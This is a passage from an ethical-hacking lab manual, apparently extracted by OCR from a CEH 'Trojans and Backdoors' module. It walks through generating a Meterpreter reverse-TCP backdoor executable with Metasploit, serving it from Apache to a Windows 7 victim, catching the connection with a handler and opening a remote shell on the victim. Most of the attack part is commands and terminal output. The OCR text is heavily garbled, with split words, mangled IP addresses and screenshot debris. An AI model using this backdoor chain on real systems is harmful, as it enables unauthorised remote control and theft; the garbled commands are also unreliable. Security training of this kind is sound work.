  • 96. Module 06 - Trojans and Backdoors FIGURE 11.1: Selecting msfconsole from metasploit Framework T ype the fo llo w in g com m and 111 m sfconsole: m s fp a ylo a d w in d o w s /m e te rp re te r/re v e rs e tc p LH O ST=10.0.0.6 X > D e s k to p /B a c k d o o r.e x e and press E n te r 3. N ote: T h is IP address (10.0.0.6) is B ackTrack machines. These IP addresses m ay vary in y o u r lab environm en t. I I BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection File « Action Media 3 ® S 0 Clipboard View Help II 1 fe 1 ► C j Applications Places system ‫ם‬ 152 TUe0Ct23. 3:32 PM I File Edit View Terminal Help 3K0a SuperHack I I Logon xracK » [ m e ta s p lo it v 4 .5 .0 dev [ c o r e : 4 b a p i: 1.0] - 927 ]=‫ ״‬e x p lo it s • 499 a u x ilia r y - 151 post - 251 ]=‫ ־ ־‬payloads • 28 encoders - 8 nops y ; > jn sfp ayload w in d o w s/ n e te rp rete r/ re ve rse tcp LHOST-1O.0.0.6 X > Desktop/Backdoor FIGURE 11.2: CreatingBackdoor.exe 4. Metasploit Framework, a tool for developing and executing exploit code against a remote target machine T in s co m m and w ill create a W in d o w s e x e c u ta b le file w ith name the B a c k d o o r.e x e and it w ill be saved on the B ackTrack 5 desktop. ‫--------------ד׳‬J File Action Media Clipboard V!*w BackTrack on W1N-D39MRSHL9E4 - Virtual Machine Connection H«lp it 0 ® @ g ■ !‫ ן‬it fe ^ Applications Places System U 1ue OCt 23. 11:53 AM A Backdoor.exe < back I track < ja a j ,Vi FIGURE 11.3: Created Backdoor.exe file 5. N o w you need to share B a c k d o o r.e x e w ith yo u r v ic tim m achine (W indow s 7), by fo llo w in g these steps: C EH Lab Manual Page 519 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 97. Module 06 - Trojans and Backdoors 6. O p e n a new B a c k T ra c k 5 te rm in a l (CTRL+ALT+T) and then nan this com m and m k d ir /v a r/w w w /s h a re and press E n te r to create a new d irector}‫ ״‬share. To createnewdirectory sharefollowing com andis m usedmkdir /var/www/share FIGURE 11.4: sharing the file 7. Change the m ode fo r the share fo ld e r to 755, by entering the com m and c h m o d -R 755 /v a r/w w w /s h a re / and then press E n te r BackTrack on W1N-D39MRSHL9E4 - V irtua l M achine C onnection File Action Media Clipboard View T=TB"■ Help <910 (■ @O II It fe , ) Applications Places System □ d FT ■Rie Oct 23.12:03 Pf/ .f t Backdoor.exe • * ‫׳י‬ > ‫א‬ ro o t^ b t: — File Edit View Terminal Help 1. - ra d r A / ><share <1 »*/ ^oot$»i ‫ - ־‬k chaod •R 755 /var/*ww /share/ | ‫י‬I c a To changedie m of ode sharefolder usethe following com and:chm -R* m od /var/www/share/ << back I track 5 ‫״‬a i FIGURE 11.5: sharing the file into 755 8. Change the ow nership o f that fo ld e r in to w w w -data, by entering the com m and c h o w n -R w w w -d a ta :w w w -d a ta /va r/w w w /s h a re / and then press Enter. C EH Lab Manual Page 520 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 98. Module 06 - Trojans and Backdoors BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection Fil• Action Midi• Clipboard M w Hilp It >® @0 II It > » Applications Places system ( * ] ' d v k I 1ue o c t 23. 12:0‫ צ‬PM r o o t ^ b t : ‫־־‬ ile Edit View Terminal Help ‫׳‬otg fet:‫ * ־‬n k d ir /var/www/share '2 i . l l L . ■ TT; i ‫■־‬ ■ot'jbt:-♦ cnown •R www d a ta :www d a ta /var/wwv/stmrc/ To change ow n e rsh ip of fo ld e r in to w w w , use th is com m and ch ow n -R w w w data /var/w w w /share/ . back I track << 5 FIGURE 11.6: Change the ownership of the folder 9. T ype the com m and Is -la /v a r/w w w / | grep sh a re and then press E n te r BackTrack on W1N-D39MR5HL9E4 - Virtual Machine Connection File Action Media •it 3 ® @ 0 Clipboard View '- !°‫*־׳‬ Help II It & Applications Places system (>‫ך‬ ‫׳‬s d v x [>< 1ue OCt 2 3 .1 -: ro o t^ b t - Tile Edit View Terminal Help ro o t^ b t:- * ro o tg b t:- # 'c -~ ro c t^ b t:- » n k d ir / v a r/ w w /s h a re chaod -R 755 / va r/ w w /s h a re / chowr -R w » data:wuw d a ta / v a r/w w /stm re/ I s - la / va r/ w w / | grep s h a r e | << back I track 5 -03 FIGURE 11.7: sharing die Backdoor.exe file 10. T he n e xt step is to start the A p a c h e s e rv e r by typ in g the s e rv ic e a p a c h e 2 s ta rt com m and 111 the term inal, and then press Enter. C EH Lab Manual Page 521 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 99. Module 06 - Trojans and Backdoors BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection Fil• Action Midi* It >® @0 CI1pbo»rd V!** Htfp II 1 > ►» Applications Places system (‫] י‬ ‫י׳‬ a ‫׳י‬ ‫א‬ I 1UC CCt 23. 12:07 PM ro o t^ b t: — File Edit View TSfrminal Help ro o tjab t:‫ # ־‬n k d ir /var/www/share rootjab t:-* ch«od -R 755 / va r/ w w /s h a re / r o o tg b t:'♦ chowr ■R v m data:www d a ta /var/wwv/shar< rootg bt:-♦ I s - la / v a r/ w w / | grep share drwxr-xr-x 2 www-data w w - d a ta 4096 2012-10-23 12■ A -pet :c l:- ♦ s e r v ic e apache2 s t a r t | * S t a r t in g web s e r v e r apache2 h ttp d (p id 3662) a lr e a d y running ‫י‬ A back I track £ << -03. & T o run the apache w e b server use th e fo llo w in g com m and: cp /root/.m sf4/data/ex p lo its /* /var/w w w /share/ FIGURE 11.8: Starting Apache Webserver 11. N o w y o u r A pache w eb server is ru n n in g , copy the B a c k d o o r.e x e tile in to the share folder. Type the fo llo w in g com m and cp /ro o t/D e s k to p /B a c k d o o r.e x e /v a r/w w w /s h a re / and press E n te r BackTrack on W1N-D39MRSHL9E4 - V irtua l M achine C onnection File Action Media Clipboard View « I©® ©a 1 !■r» 1» ‫ד « ח ״ן ־ן‬ Help , A Backdoor.exe ‫־״־‬ v‫׳‬ x r o o t 'J b t : ~ R le Edit View Terminal Help rootstot:-# n k d ir / v a r/ w w /s h a re root0b t :-41 chaod -R 755 / va r/ w w /s h a re / ro o t§ b t:~ # chown r m/m data:w vw d a ta /var/w w vr/sh ar• /-.^ ro o tp b t:*# I s - la /war/mm/ | grep share d r w x r - x r x 2 v/^v d a ta ww#r d a ta 4096 2612 JQ-21 n ! n 1 utm r o o t 0 b t :* f s e r v ic e apache2 s t a r t • S t a r t in g web s e r v e r apache2 h ttp d (p ld 360?) a lr e a d y running rootflbt:-* cp/root/Desktop/Backdoor.exe /var/www/share/ L i J l : O ii : 111:1 1■■U , . ! : a l . tiu - u l : . f l . L LL i i i 11:1. ‫י‬ cp /root/Pe> kt9p/Bdckdoor.exe /var/www/shdie/ << back I track ‫יו‬ 1 Status: Running FIGURE 11.9: Running Apache W server eb 12. N o w go to W in d o w s 7 V irtu a l M achine, open F ire lo x o r any w eb brow ser, and type the U R L h ttp ://1 0 .0 .0 .6/s h a re /111 the URL field and then press E n te r N ote: H ere 10.0.0.6 is the IP address o f B ackTrack; it may vary 111 yo u r lab environm ent. C EH Lab Manual Page 522 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 100. Module 06 - Trojans and Backdoors ‫י‬ Windows 7 on W1N-D39MR5HL9E4 - Virtual M a r in e Connection Fil• Action Media Clipboard V!** ‫> (יי) 0 »׳‬Q n 1 ;e0 ! ►f Halp Indtx of /thaw ’ a ac1 .0 .6 h ' ' 0 .0 C G«ttin9 $U11*d i..i Su99«a«d SiUt l£1 MottVniUd *11‫ ־‬GopfJe - =' ‫ ־‬te ‫׳‬ ■ ‫* °׳‬ D B»knw I W«b 9 <■041ay Index o f/s h a re N am e L a s t m ud ilit-d S u e D e scrip tio n Parent Directory 23- 0 c t- 2 0 12 12:12 7 2 K Apache/2.2 .14 (Ubtmru) Server a t 1 0 0 .0 .6 P o rt SO BaikTratj^^VI■ J ^ W indow^o^fl, FIGURE 11.10: Firefox web browser with Backdoor.exe 13. D o w n lo a d and save die B a c k d o o r.e x e tile 111 W in d o w s 7 V irtu a l M achine, and save d iis file o n die desktop. If you d id n 't have apache2 in sta lle d , run aptg e t in s ta ll apache2 HZ ‫י‬ Action Media Clipboard View‫׳‬ Help 1 ® @0 ri i• fe • 0 s 5 C EH Certified Ithical Hacker •nu Unjl* w FIGURE 11.11: S aved Backdoor.exe on desktop 14. S w itch back to the B a c k T ra c k m achine. 15. O pe n the M e ta s p lo it console. T o create a handler to handle the co n ne ctio n fro m v ic tim m acliine (W indow s 7), type the com m and use e x p lo it/m u lti/h a n d le r and press E n te r C EH Lab Manual Page 523 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 101. Module 06 - Trojans and Backdoors £0 The exploit will be saved on / root/.msf4/data/exploits/ folder BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection Fil• Action It > ® Midi• CI!pbo»rd @ 0 II It V!** Htfp >» Applications Placcs system ‫י׳‬ Bnckdoor.e v A I 1UC OCt 23. 12:30 PM , x !term in al f '1 Edlt V1ew Terminal Help * ! ( .‫־‬ •‫/ * ״‬ n sf > n sfp ayloa d w1 ndows/‫ »׳‬e t e r p r e t e r / re v e rs e tc p LH O SW 9 7T 1m 7 b.9 1 X^Ogfefetop/Backdoor.exe [ * ] ex ec: n sfp ay lo a d w in d o w s / r e t e r p r e t e r / re v e r s e t c p LHOST-192. I$ a- e 0 ?9 ix > C ^ g w ^ ^ j d o o r C reated by n sfp ay lo a d ( h t t p :/ A A M . n e t a s p lo i t .c o n ). Pay lo a d : windows/met e r p r e t e r / r e v e r s e tc p L en g th : 290 O p tions: ("LHOST192 .1 68 .8 .91 ■ := "> < *‫־‬ n sf > use e x p lo it / n u lt i/ h a rK f le r | n sf e x p lo it (h a n d le r) > % << back I track FIGURE 11.12: Exploit the victim m achine 16. T o use the reverse T C P , type the com m and s e t pa ylo a d w in d o w s /m e te rp re te r/re v e rs e _ tc p and press E n te r •‫ן ז « ׳ ״׳‬ BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection File Action Media <01 ® e e 0 Clipboard View Help 1 it ‫ ן‬h *> 1 Applications Places system £ [y 1u O 23. 12:36 PM , j >, e Ct Backdoor.J Fl|e Edit View Terminal Help U To set reverseTCPv e =U is the following com and set m payload windows/m eterpreter/reverse - tcP msf > tisfp ayload w in d o w s/ n e te rp re te r/ re ve rse tc p L H O ST 1 9 2 .168.8.91‫־‬ [*1 ex ec: n sfp ay lo a d w ln d o w s / re te rp re te r/ re v e rs e tcp LH0ST=192.J68.8 I !esktop/Backdoor.exe ^ *jp e s k top /Ba c kd 00 r Created by n sfp ay lo a d ( h t tp :/ / M M .n e t a s p lo it .c o n ) . Pay lo a d : w ind ow s/m e te rprete r/re ve rse tc p Length: 290 Opt io n s : { ‫־־‬LHOST"->" 192.168 8 .9 1 ‫> ״‬ B S l > use e x o lo lt/ B u ltl/handler il f ;f/ ^ nsf e x p lo it(handler) >jset payload windowi/meterpreter/reveise tcp I pay I on d -> windows/mete rpmvr7TPVPrCT‫ ־‬rrp 1 flfcf exploit (h a n d le r ) > < back I track 5 < FIGURE 11.13: Setup die reverse TCP 17. T o set the local IP address th a t w ill catch the reverse connectio n, type the co m m and s e t Ih o s t 10.0.0.6 (B a c k T ra c k IP A d d re ss) and press E n te r C EH Lab Manual Page 524 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 102. Module 06 - Trojans and Backdoors BackTrack 0‫ ח‬WIN-D39MR5HL9C4 - Virtual Machine Connection Fil• Action •it 9 (•) Midi* © 0 Clipboard Vi** H*lp M l* • Applications Placcs system (* J d I HJC o ct 23. 12:40 PM 15 r A v * T ro a / I fcr inl Bnckdoor.J File Edit View Terminal Help ! n i l > is fp a y lo a d wind01r fs / » e te rp re te r/ re v e rs e _ tc p 1H0ST-192.1 68.8.91 X > Oesktop/Backdoor.exe | [+ j exec: m sfpayload w in d o w s/ n e te rp re te r/ re ve rse tcp LHQST-192.168.8.91 X > Desktop/Backdoor.! Created by rasfpayload ( h T tp :/ / w w x .n e ta sp lo it.c o « 1)._ — "" Pay lo a d : w in d o vs / m e te rp re te r/ re ve rs e _tcp Length: 298 o p tio n s : {"LH05T“ =>"192. 1 68.8.91*} msf > use e x p lo .it/ 11u lt i/ h a n d le r msf e x p l o i t ( h a n d le r) > s e t paylo ad w m d o w s / n ete rp rete r/re ve rs e tc p payload => w indow s/neterp re T e r/ re y e rs e tco msf e x p lo it (h a n d le r) > |set Ih o s t 1 8 .6 .S .6 | Ih o s T => 1 0 . 6 . 0 . 6 e x p l o i t ( h a n d le r ) >_________________________________________________________ << back I track 58a. FIGURE 11.14: set the lost local IP address 18. T o start the handler, type the com m and e x p lo it -j - z and press E n te r I I 1 BackTrack on W1N-D39MR5HL9£4 - Virtual Machine Connection File Action Media Clipboard » ‫^ •! >@ ® נ‬ 11 » View Help a j Applications Places system [> ^j TUe OCt 23.12:44 PM ^ ■ | ‫■־״™״יי< “ ־‬ /4t ‫י‬ Backdoor.d File Edit View Terminai Help C reated by n sfp ay lo a d ( h t t p :/ / w w . n e t a s p lo it . c o n ) . P a y lo a d : windows/meterp r e t e r / reve rse tc p Length: 298 O p tions: { ‫־‬ ,IHOST■ ‘=>•'192.168.8.91‫} ״‬ msf > use e x p lo it / n u lt i/ h a n d le r msf e x p lo it (h a n d le r) > s e t paylo ad w ind ow s/n e te rp ret payload => w in d o w s/ rie terp re ter/ reve rs e tcp msf e x p lo it (h a n d le r ) > s e t Ih o s t 1 8 .8 .8 .6 Ih o s t - > 1 0 .0 .0 . 6 j msf e x p l o i t ( h a n d le r) > !e x p lo it -j - 1 1 I* ] Exp loit running as background job [ - I S t a r t e d re v e rs e h and ler on 18.0 .6 .6 :4 44 4 I ‫״־‬I S t a r t in g the payload h a n d le r ... msf e x p lo it (h a n d le r) > I < back I track 5 < FIGURE 11.15: Exploit the windows 7 m achine 19. N o w sw itch to the v ic tim m a c h in e (W indow s 7) and d o u b le -click the B a c k d o o r.e x e file to ru n i t (w hich is already dow nloaded) 20. A g ain sw itch to the B ackT rack m achine and yo u can see the fo llo w in g figure. C EH Lab Manual Page 525 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 103. Module 06 - Trojans and Backdoors !- ,“ ‫י * י‬ BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection Filt •it Action M#di* CI1 pbo»rd S (•) @ O II Vi•* Htfp 1► * » Applications Places system ^ / a v d M: TUcoct23. 3:02 pm , x ‫־‬ !terminal File Edit View Terminal Help Back( ♦ " *‫ “־‬I 927 exploits • 499 a u x ilia ry • 151 post « 251 ]■-- • payloads ■ ‫־‬ 28 encoders 8 nops 1st > msfpayload windows/iieterpreter/reverse tcp LHOST-10.0.0 6 X > Desktop Backdoor.exe [* ] exec: nsfpayload windoirfs/meterpreter/reversetcp LHOST=10.0.0.6 X > Desktop Backdoor.exe sh: Desktop: is a directory msf > msfpayload windows/neterpreter/reversetcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe l ‫ ״‬J exec: nsfpayload windoirfs/meTerpreter/reverse tcp LHO^I‫ ־‬lft.ft.-O^TX 0‫־*י‬e1^‫״‬ tt’6J»/Backdoor.exe 1 11 Created by msfpayload < ttp ://*w .n etasp lo t.co ) . h Payload: windows/neterpreter/reversetcp Length: 290 Options: { -LH0ST‫} ־6 .0 .0 .01*<=״‬ a k l > use e x p lo it/ m u lti/ h a n d le r r s f e x p l o i t ( h a n c le r ) > s e t paylo ad w in d o w s/ n e te rp rete r/ re ve rse tcp payload => w in d o w s / m e te rp re te r/ re v e rs e tc p aisf e x p l o i t ( h a n d le r) > s e t Ih o s t 1 0 .0 .8 .6 ^ I host = 10.0.0.6 > _ lil e x p l o i t ( h a n d le r) > e x p lo it -J -£| [ * ] E x p lo it ^ ^ n n ir ^ i^ f c a ^ ii^ o u r ^ ijo W / T ■ [* ]^ ^ r t^ t a f e v e r ‫ «ל‬randier of! 18.0.9.6:444} l3 *‫ ־‬Starting the pjtfytoad hsrdier^rr J i ■ni sfl ______________ Lf cl L is. e x p lo itt ( h an d le r ) > [ ‫ ] ״‬Send ing S t J^ e (751121 b y te s ) to 1 0 .0 .0 .5 p l o i ( h a n d le r) [• ! s B c (751128 !]‫ ־‬J In te rp re te r session 1 opened (10.C 6.6:4444 -> 10.0.0.5:49458) at ,1 2012-19-23 !?‫♦ 25175:־‬ 0530 | l& T o in te ra c t w ith th e availab le session, you can use sessions -i <session id> FIGURE 11.16: Exploit result of windows 7 machine 21. T o in teract w ith the available session, type the com m and s e s s io n s -i 1 and press E n te r FIGURE 11.17: creating the session 22. E n te r the com m and s h e ll, and press Enter. C EH Lab Manual Page 526 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 104. | File <n 0 Media (•) ® Clipboard o 11 V!*w Help » 1► Applications !,laccs system ^ / a n / □ BackTrack on W1N-D39MRSHL9E4 - Virtual Machine Connection Action ‫ך‬ * r . 1 Module 06 - Trojans and Backdoors d 1^ RJC OCt 23, 3:13 PM x *!terminal File Edit view ifefmmal Help Backc Created by m sfpayload ( h ttp ://w w w .n e ta sp lo 1 t.c o ■ >. Pay lo a d : w in d o w s/ n e te rp rete r/ re ve rse tep Length: 290 O p tions: CLHOST* 10. 0. 0. 6“ <■‫} "־‬ n k l > use e x p lo it/ m u lti/ h a n d le r msf e x p l o i t ( h a n d le r) > s et paylo ad w in d o w s / n e te r p r e te r / re v e r s e tc p payload *> w in d o w s / m e te rp re te r/ re v e rs e tc p «1s f e x p l o i t ( h a n d le r) > s e t !h o s t 1 6 .6 .8 .6 I host 1 0 .0 .0 .6 <‫־‬ B i l e x p l o i t ( h a n d le r) > e x p lo it -j -2 [ * J E x p lo it running as background job . [*1 S t a r t e d re v e rs e h and ler on 16.6 .6 .6 :4 44 4 [ * j S t a r t in g th e payload h a n d le r . .. I l i l e x p l o i t ( h a n d le r) > [ * ] Send ing s tag e (752128 b y te s ) to 1 6 .0 .6 .5 [ * ] H e te r p r e te r s e s s io n 1 opened (1 6.6 .0 .6 :4 4 4 4 -> 16.6 .0 .5 :4 94 5 8) a t 2612-10n sf e x p l o i t ( h a n d le r) > s es s io n s * i 1 [ * ] S t a r t in g in t e r a c t io n w ith 1 . . . c!«JS<1V1‫״‬I J Q L | M ic r o s o ft Windows T v e / s i o i f i f n . 76&Tj C op yrigh t ( c ) 2609 M ic r o s o ft C o rp o ra tio n . L I Q L IV Al r ig h t s res e rv ed , c :usersAiH nlnpesktop>| FIGURE 11.18: Type the shell command 23. T ype the d ir com m and and press E n te r I t shows all the directories present o n the v ic tim m achine (W indow s 7). BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection File Action Media Clipboard View 11' r ’ -° Help <010 ® @e 111►fe 5 1 Applications Places system / .. / a x y cj x Term inal File Edit view lerm inal Help Backc »1s f e x p l o i t ( h a n d le r) > s e s s io n s - i 1 [- ] I n v a li d s e s s io n id n sf e x p l o i t ( h a n d le r) > s e s s io n s ■i 2 [ * ] s t a r t in g in t e r a c t io n w ith 2 . . . n e t e rp r e t e r > s h e ll Process 2546 c re a te d . Channel 1 c r e a te d . M ic r o s o ft windows [v e r s io n 6.1.76011 C op yrigh t ( c ) 2609 M ic r o s o ft C o rp o ra tio n . A l l rig h t s rese rved . C : UsersAdwinDesktop?f a i f I d ir volum in drive c has no label. e Volume S e r i a l Nunber i s 6868-71F6 Oirectory of C:UsersAdninDesktop 10/23/2012 02:56 <0IR> I | a . ftp s Ljsis 2 O ir (s ) 56.679,985.152 b y t e s lfr e e C :UsersAdrn1 nDesktop>§_________________________________________________ FIGURE 11.19: check die directories of windows 7 L a b A n a ly s is Analyze and docum ent die results related to die lab exercise. G ive your opinion on yo ur target’s security posture and exposure dirough public and free inform ation. C EH Lab Manual Page 527 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 105. PLEASE T A L K TO YOUR IN S T R U C T O R IF YOU H A V E Q U E S T IO N S R E L A T E D TO T H IS LAB. T o o l/U tility M e ta s p lo it In fo r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d O u tp u t: H a ck the W in d o w s 7 m achine directories In te r n e t C o n n e c tio n R e q u ire d □ Y es 0 No P la tfo r m S u p p o rte d 0 C la s s ro o m C EH Lab Manual Page 528 0 iLabs Ethical Hacking and Countermeasures Copyright © by EC-Council A l Rights Reserved. Reproduction is Stricdy Prohibited.